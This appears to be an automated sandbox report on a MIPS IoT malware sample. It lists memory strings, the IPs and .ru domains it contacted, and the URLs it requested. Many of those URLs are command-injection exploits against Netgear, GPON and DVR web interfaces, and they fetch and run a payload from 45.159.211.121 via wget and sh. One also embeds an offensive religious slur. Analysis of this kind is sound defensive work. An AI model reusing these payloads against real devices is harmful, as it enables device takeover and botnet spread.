Source: firmware.mipsel.elf, 5639.1.000055f672177000.000055f6721fe000.rw-.sdmp, firmware.mipsel.elf, 5641.1.000055f672177000.000055f6721fe000.rw-.sdmp, firmware.mipsel.elf, 5643.1.000055f672177000.000055f6721fe000.rw-.sdmp, firmware.mipsel.elf, 5657.1.000055f672177000.000055f6721fe000.rw-.sdmp, firmware.mipsel.elf, 5656.1.000055f672177000.000055f6721fe000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/mipsel
Source: firmware.mipsel.elf, 5639.1.00007ffe78883000.00007ffe788a4000.rw-.sdmp, firmware.mipsel.elf, 5641.1.00007ffe78883000.00007ffe788a4000.rw-.sdmp, firmware.mipsel.elf, 5643.1.00007ffe78883000.00007ffe788a4000.rw-.sdmp, firmware.mipsel.elf, 5657.1.00007ffe78883000.00007ffe788a4000.rw-.sdmp, firmware.mipsel.elf, 5656.1.00007ffe78883000.00007ffe788a4000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mipsel
Source: firmware.mipsel.elf, 5641.1.00007ffe78883000.00007ffe788a4000.rw-.sdmp, firmware.mipsel.elf, 5643.1.00007ffe78883000.00007ffe788a4000.rw-.sdmp, firmware.mipsel.elf, 5657.1.00007ffe78883000.00007ffe788a4000.rw-.sdmp, firmware.mipsel.elf, 5656.1.00007ffe78883000.00007ffe788a4000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
152.225.25.10
 unknown United States
701 UUNETUS false
98.82.221.255
 unknown United States
11351 TWC-11351-NORTHEASTUS false
168.211.86.213
 unknown South Africa
136525 WANCOMPVTLTD-AS-APWancomPvtLtdPK false
221.139.227.241
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR false
105.33.232.144
 unknown Egypt
37069 MOBINILEG false
209.49.144.22
 unknown United States
2828 XO-AS15US false
183.45.195.105
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
204.228.113.148
 unknown United States
30136 AD12US false
124.65.79.187
 unknown China
4808 CHINA169-BJChinaUnicomBeijingProvinceNetworkCN false
136.82.88.23
 unknown United States
60311 ONEFMCH false
172.185.168.224
 unknown United States
7018 ATT-INTERNET4US false
202.212.69.149
 unknown Japan 2514 INFOSPHERENTTPCCommunicationsIncJP false
88.236.146.222
 unknown Turkey
9121 TTNETTR false
94.82.53.83
 unknown Italy
3269 ASN-IBSNAZIT false
67.109.245.165
 unknown United States
23492 NEZPERCETRIBEUS false
153.201.219.211
 unknown Japan 4713 OCNNTTCommunicationsCorporationJP false
13.181.67.30
 unknown United States
7018 ATT-INTERNET4US false
138.228.27.129
 unknown Switzerland
12980 EMEAHostingAutonomousSystemEU false
2.6.97.78
 unknown France
3215 FranceTelecom-OrangeFR false
221.131.10.131
 unknown China
56042 CMNET-SHANXI-APChinaMobilecommunicationscorporationCN false
120.67.144.211
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
93.116.206.187
 unknown Moldova Republic of
8926 MOLDTELECOM-ASMoldtelecomAutonomousSystemMD false
108.163.174.119
 unknown Canada
32613 IWEB-ASCA false
181.101.151.162
 unknown Argentina
7303 TelecomArgentinaSAAR false
83.253.89.29
 unknown Sweden
39651 COMHEM-SWEDENSE false
161.16.223.43
 unknown United States
19512 LYONDELLUS false
145.22.120.231
 unknown Netherlands
1103 SURFNET-NLSURFnetTheNetherlandsNL false
124.125.212.167
 unknown India
18101 RELIANCE-COMMUNICATIONS-INRelianceCommunicationsLtdDAKC false
121.183.113.116
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
199.171.250.124
 unknown United States
701 UUNETUS false
51.195.138.88
 unknown France
16276 OVHFR false
189.144.247.20
 unknown Mexico
8151 UninetSAdeCVMX false
169.6.52.139
 unknown United States
203 CENTURYLINK-LEGACY-LVLT-203US false
108.169.82.177
 unknown United States
7065 SONOMAUS false
222.175.232.11
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
217.67.51.61
 unknown United Kingdom
5413 AS5413GB false
100.158.1.209
 unknown United States
21928 T-MOBILE-AS21928US false
4.103.125.116
 unknown United States
3356 LEVEL3US false
8.166.36.114
 unknown Singapore
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd false
157.24.67.223
 unknown Finland
1741 FUNETASFI false
84.153.235.131
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
220.127.20.225
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
210.174.120.181
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
196.190.152.165
 unknown Ethiopia
24757 EthioNet-ASET false
118.243.43.42
 unknown Japan 4685 ASAHI-NETAsahiNetJP false
98.62.168.255
 unknown United States
7922 COMCAST-7922US false
114.255.32.241
 unknown China
4808 CHINA169-BJChinaUnicomBeijingProvinceNetworkCN false
96.104.31.212
 unknown United States
7922 COMCAST-7922US false
49.99.150.101
 unknown Japan 9605 DOCOMONTTDOCOMOINCJP false
190.228.164.174
 unknown Argentina
7303 TelecomArgentinaSAAR false
208.51.74.79
 unknown United States
3549 LVLT-3549US false
77.81.62.211
 unknown Azerbaijan
41950 NETLOG-ASRO false
95.140.82.100
 unknown Russian Federation
31500 GLOBALNET-ASRU false
58.100.227.121
 unknown China
24139 WASUHZHuashumediaNetworkLimitedCN false
182.154.150.117
 unknown New Zealand
17435 VNGSL-AS-NZVodafoneNextGenerationServicesLimitedNZ false
132.108.97.252
 unknown United States
306 DNIC-ASBLK-00306-00371US false
197.173.180.24
 unknown South Africa
37168 CELL-CZA false
138.146.246.38
 unknown United States
721 DNIC-ASBLK-00721-00726US false
85.134.68.147
 unknown Finland
24751 MULTIFI-ASFI false
157.98.209.19
 unknown United States
3527 NIH-NETUS false
146.163.221.234
 unknown United States
53695 SIUEUS false
75.22.56.84
 unknown United States
7018 ATT-INTERNET4US false
104.204.118.117
 unknown United States
19397 ACN-DIGITAL-PHONEUS false
205.80.82.16
 unknown United States
647 DNIC-ASBLK-00616-00665US false
167.67.75.244
 unknown United States
54996 SCRIPPSHEALTHUS false
164.146.217.96
 unknown South Africa
37130 SITA-ASZA false
34.67.142.130
 unknown United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
152.155.24.213
 unknown United States
6400 CompaniaDominicanadeTelefonosSADO false
185.216.24.38
 unknown France
62000 NETRIX-ASNetrixFR false
79.238.0.18
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
142.232.240.199
 unknown Canada
4476 BCITCA false
187.56.202.110
 unknown Brazil
27699 TELEFONICABRASILSABR false
12.184.225.52
 unknown United States
7018 ATT-INTERNET4US false
59.9.218.254
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
112.70.212.31
 unknown Japan 17511 OPTAGEOPTAGEIncJP false
34.242.192.214
 unknown United States
16509 AMAZON-02US false
129.131.230.28
 unknown United States
2701 KSU-NETUS false
93.43.15.58
 unknown Italy
12874 FASTWEBIT false
111.98.222.200
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
50.165.134.53
 unknown United States
7922 COMCAST-7922US false
147.138.53.159
 unknown United States
397179 BRIDGEWATER-COLLEGEUS false
1.227.42.114
 unknown Korea Republic of
9277 SKB-T-AS-KRSKBroadbandCoLtdKR false
148.135.13.40
 unknown Sweden
158 ERI-ASUS false
4.143.200.95
 unknown United States
3356 LEVEL3US false
192.132.32.149
 unknown United States
18568 BIDTELLECTUS false
97.108.17.1
 unknown Canada
812 ROGERS-COMMUNICATIONSCA false
85.135.47.177
 unknown Czech Republic
30764 PODA-ASCZ false
178.115.143.156
 unknown Austria
25255 H3G-AUSTRIA-ASTELE2AUSTRIAAT false
125.245.69.154
 unknown Korea Republic of
9316 DACOM-PUBNETPLUS-AS-KRDACOM-PUBNETPLUSKR false
187.5.144.99
 unknown Brazil
8167 BrasilTelecomSA-FilialDistritoFederalBR false
210.165.163.176
 unknown Japan 2514 INFOSPHERENTTPCCommunicationsIncJP false
13.233.94.241
 unknown United States
16509 AMAZON-02US false
104.30.194.47
 unknown United States
13335 CLOUDFLARENETUS false
96.231.70.173
 unknown United States
701 UUNETUS false
19.161.124.85
 unknown United States
3 MIT-GATEWAYSUS false
108.149.78.189
 unknown United States
16509 AMAZON-02US false
169.85.189.245
 unknown United States
37611 AfrihostZA false
78.220.1.241
 unknown France
12322 PROXADFR false
157.68.103.237
 unknown Japan 4713 OCNNTTCommunicationsCorporationJP false
52.66.82.221
 unknown United States
16509 AMAZON-02US false

Contacted Domains

Name IP Active
dldd.ru 194.58.112.165 true
www.dlbl.ru 31.31.205.163 true
afaa.ru 194.58.112.165 true
www.ldaa.ru 159.69.115.63 true
www.ckea.ru 194.120.116.196 true
eddl.ru 194.58.112.165 true
alka.ru 62.122.170.171 true
cklc.ru 159.69.115.63 true
keab.ru 62.122.170.171 true
dlbl.ru 31.31.205.163 true
lcbe.ru 31.31.205.163 true
www.kaaa.ru 159.253.18.15 true
bcka.ru 62.122.170.171 true
klaa.ru 31.177.80.70 true
dakl.ru 31.31.205.163 true
www.afad.ru 62.122.170.171 true
fcaa.ru 62.122.170.171 true
www.fkac.ru 62.122.170.171 true
cael.ru 31.31.205.163 true
cdad.ru 31.177.80.70 true
ceff.ru 62.122.170.171 true
www.afbc.ru 31.31.205.163 true
adfe.ru 31.31.205.163 true
www.facd.ru 87.236.16.74 true
afad.ru 62.122.170.171 true
www.afkc.ru 62.122.170.171 true
www.aede.ru 188.114.96.9 true
www.cklc.ru 159.69.115.63 true
leed.ru 62.122.170.171 true
lcdk.ru 185.230.63.171 true
www.dldd.ru 194.58.112.165 true
www.leed.ru 62.122.170.171 true
ckea.ru 45.159.211.121 true
www.eddl.ru 194.58.112.165 true
baal.ru 62.122.170.171 true
www.bcka.ru 62.122.170.171 true
www.fcaa.ru 62.122.170.171 true
fkac.ru 62.122.170.171 true
alda.ru 185.130.251.70 true
www.kekk.ru 62.122.170.171 true
ceke.ru 31.31.205.163 true
www.aefa.ru 159.69.115.63 true
aada.ru 31.31.196.247 true
www.lacd.ru 62.122.170.171 true
www.dbfk.ru 31.31.205.163 true
akdb.ru 62.122.170.171 true
www.fadc.ru 31.31.205.163 true
ladd.ru 91.219.150.194 true
akkc.ru 141.8.195.73 true
www.akdb.ru 62.122.170.171 true
www.afab.ru 194.58.112.174 true
www.back.ru 62.122.170.171 true
aeef.ru 159.69.115.63 true
ekac.ru 62.122.170.171 true
www.baal.ru 62.122.170.171 true
cakc.ru 62.122.170.171 true
www.eeca.ru 159.69.115.63 true
www.alda.ru 185.130.251.70 true
www.adfe.ru 31.31.205.163 true
www.ceff.ru 62.122.170.171 true
ccle.ru 159.69.115.63 true
www.dedk.ru 62.122.170.171 true
daisy.ubuntu.com 162.213.35.25 true
aaae.ru 31.177.76.145 true
www.daak.ru 5.188.28.172 true
ealf.ru 31.31.205.163 true
aede.ru 188.114.97.3 true
www.alka.ru 62.122.170.171 true
td-ccm-neg-87-45.wixdns.net 34.149.87.45 true
llbc.ru 159.69.115.63 true
www.keab.ru 62.122.170.171 true
cafe.ru 185.215.4.51 true
www.cfea.ru 62.122.170.171 true
www.aelc.ru 62.122.170.171 true
kaek.ru 31.31.205.163 true
ddad.ru 80.87.198.249 true
www.calk.ru 185.135.83.132 true
eele.ru 31.177.76.145 true
www.edfk.ru 62.122.170.171 true
www.faed.ru 31.31.205.163 true
www.lacb.ru 62.122.170.171 true
www.bdaa.ru 159.69.115.63 true
www.aeck.ru 194.58.112.165 true
www.dakl.ru 31.31.205.163 true
kaaa.ru 159.253.18.15 true
cfea.ru 62.122.170.171 true
www.cdak.ru 91.193.180.124 true
eeaa.ru 185.149.243.53 true
lcda.ru 194.58.112.165 true
www.ellc.ru 91.218.228.13 true
bdaa.ru 159.69.115.63 true
edfk.ru 62.122.170.171 true
www.ddda.ru 62.122.170.171 true
lldc.ru 194.58.112.165 true
www.llbc.ru 159.69.115.63 true
bell.ru 185.225.35.210 true
www.lcda.ru 194.58.112.165 true
bbcf.ru 31.31.205.163 true
ellc.ru 91.218.228.13 true
bcaf.ru 159.69.115.63 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://104.21.5.151/ false
  • Avira URL Cloud: safe
 unknown
http://192.168.0.7/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
    		unknown
    http://192.168.0.1/GponForm/diag_Form?images/ false
    • Avira URL Cloud: safe
    		 unknown
    http://192.168.0.7/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
    • Avira URL Cloud: safe
    		 unknown
    http://188.114.97.3/ false
    • Avira URL Cloud: safe
    		 unknown
    http://192.168.0.7/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
      		unknown
      http://192.168.0.1/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
      • Avira URL Cloud: safe
      		 unknown
      http://192.168.0.123/language/Swedish false
      • Avira URL Cloud: safe
      		 unknown
      http://192.168.0.187/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
        		unknown
        http://80.87.198.249/ false
        • Avira URL Cloud: safe
        		 unknown
        http://192.168.0.183/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
          		unknown
          http://185.215.4.51/ false
          • Avira URL Cloud: safe
          		 unknown
          http://192.168.0.3/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
            		unknown
            http://192.168.0.187/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
            • Avira URL Cloud: safe
            		 unknown
            http://192.168.0.4/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
            • Avira URL Cloud: safe
            		 unknown
            http://178.208.83.41/ false
            • Avira URL Cloud: safe
            		 unknown
            http://192.168.0.3/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
            • Avira URL Cloud: safe
            		 unknown
            http://185.130.251.70/ false
            • Avira URL Cloud: safe
            		 unknown
            http://192.168.0.119/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
            • Avira URL Cloud: safe
            		 unknown
            http://192.168.0.59/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
            • Avira URL Cloud: safe
            		 unknown
            http://192.168.0.123/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
              		unknown
              http://192.168.0.119/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
              • Avira URL Cloud: safe
              		 unknown
              http://185.135.83.132/ false
              • Avira URL Cloud: safe
              		 unknown
              http://192.168.0.14/GponForm/diag_Form?images/ false
              • Avira URL Cloud: safe
              		 unknown
              http://192.168.0.3/GponForm/diag_Form?images/ false
              • Avira URL Cloud: safe
              		 unknown
              http://192.168.0.123/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
              • Avira URL Cloud: safe
              		 unknown
              http://62.122.170.171/ false
              • Avira URL Cloud: safe
              		 unknown
              http://192.168.0.217/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                		unknown
                http://192.168.0.5/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                  		unknown
                  http://192.168.0.215/GponForm/diag_Form?images/ false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://141.8.195.73/ false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://192.168.0.1/language/Swedish false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://192.168.0.14/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                    		unknown
                    http://159.69.115.63/ false
                    • Avira URL Cloud: safe
                    		 unknown
                    http://192.168.0.9/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                      		unknown
                      http://192.168.0.183/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                        		unknown
                        http://192.168.0.183/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                        • Avira URL Cloud: safe
                        		 unknown
                        http://31.31.196.247/ false
                        • Avira URL Cloud: safe
                        		 unknown
                        http://192.168.0.4/language/Swedish false
                        • Avira URL Cloud: safe
                        		 unknown
                        http://192.168.0.3/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                        • Avira URL Cloud: safe
                        		 unknown
                        http://192.168.0.119/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                          		unknown
                          http://192.168.0.198/language/Swedish false
                          • Avira URL Cloud: safe
                          		 unknown
                          http://192.168.0.59/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                            		unknown
                            http://192.168.0.217/GponForm/diag_Form?images/ false
                            • Avira URL Cloud: safe
                            		 unknown
                            http://185.149.243.53/ false
                            • Avira URL Cloud: safe
                            		 unknown
                            http://192.168.0.198/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                              		unknown
                              http://192.168.0.217/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                              • Avira URL Cloud: safe
                              		 unknown
                              http://192.168.0.123/GponForm/diag_Form?images/ false
                              • Avira URL Cloud: safe
                              		 unknown
                              http://192.168.0.3/language/Swedish false
                              • Avira URL Cloud: safe
                              		 unknown
                              http://192.168.0.123/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                              • Avira URL Cloud: safe
                              		 unknown
                              http://5.188.28.172/ false
                              • Avira URL Cloud: safe
                              		 unknown
                              http://192.168.0.187/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                              • Avira URL Cloud: safe
                              		 unknown
                              http://185.230.63.186/ false
                              • Avira URL Cloud: safe
                              		 unknown
                              http://192.168.0.1/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                		unknown
                                http://192.168.0.4/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                  		unknown
                                  http://31.177.76.70/ false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.198/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.7/GponForm/diag_Form?images/ false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.7/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                    		unknown
                                    http://194.58.112.174/ false
                                    • Avira URL Cloud: safe
                                    		 unknown
                                    http://192.168.0.59/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                      		unknown
                                      http://185.230.63.107/ false
                                      • Avira URL Cloud: safe
                                      		 unknown
                                      http://192.168.0.9/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                      • Avira URL Cloud: safe
                                      		 unknown
                                      http://192.168.0.217/language/Swedish false
                                      • Avira URL Cloud: safe
                                      		 unknown
                                      http://192.168.0.198/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                      • Avira URL Cloud: safe
                                      		 unknown
                                      http://192.168.0.187/language/Swedish false
                                      • Avira URL Cloud: safe
                                      		 unknown
                                      http://192.168.0.1/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                        		unknown
                                        http://192.168.0.1/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                          		unknown
                                          http://192.168.0.7/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                          • Avira URL Cloud: safe
                                          		 unknown
                                          http://192.168.0.14/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                            		unknown
                                            http://192.168.0.9/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                              		unknown
                                              http://192.168.0.198/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                		unknown
                                                http://192.168.0.14/language/Swedish false
                                                • Avira URL Cloud: safe
                                                		 unknown
                                                http://192.168.0.119/GponForm/diag_Form?images/ false
                                                • Avira URL Cloud: safe
                                                		 unknown
                                                http://192.168.0.9/GponForm/diag_Form?images/ false
                                                • Avira URL Cloud: safe
                                                		 unknown
                                                http://192.168.0.215/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                  		unknown
                                                  http://192.168.0.183/language/Swedish false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://192.168.0.217/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://192.168.0.4/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                    		unknown
                                                    http://192.168.0.9/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                      		unknown
                                                      http://31.177.80.70/ false
                                                      • Avira URL Cloud: safe
                                                      		 unknown
                                                      http://192.168.0.7/language/Swedish false
                                                      • Avira URL Cloud: safe
                                                      		 unknown
                                                      http://185.225.35.210/ false
                                                      • Avira URL Cloud: safe
                                                      		 unknown
                                                      http://192.168.0.4/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                        		unknown
                                                        http://192.168.0.4/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                                        • Avira URL Cloud: safe
                                                        		 unknown
                                                        http://192.168.0.59/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                          		unknown
                                                          http://192.168.0.59/GponForm/diag_Form?images/ false
                                                          • Avira URL Cloud: safe
                                                          		 unknown
                                                          http://192.168.0.215/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                            		unknown
                                                            http://188.114.96.3/ false
                                                            • Avira URL Cloud: safe
                                                            		 unknown
                                                            http://192.168.0.215/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                              		unknown
                                                              http://192.168.0.5/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                		unknown
                                                                http://192.168.0.3/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                  		unknown
                                                                  http://192.168.0.5/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                                  • Avira URL Cloud: safe
                                                                  		 unknown
                                                                  http://192.168.0.59/language/Swedish false
                                                                  • Avira URL Cloud: safe
                                                                  		 unknown
                                                                  http://192.168.0.119/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                    		unknown
                                                                    http://192.168.0.183/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                      		unknown
                                                                      http://192.168.0.14/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                                      • Avira URL Cloud: safe
                                                                      		 unknown
                                                                      http://192.168.0.59/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                                                      • Avira URL Cloud: safe
                                                                      		 unknown
                                                                      http://192.168.0.123/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                        		unknown
                                                                        http://91.193.180.124/ false
                                                                        • Avira URL Cloud: safe
                                                                        		 unknown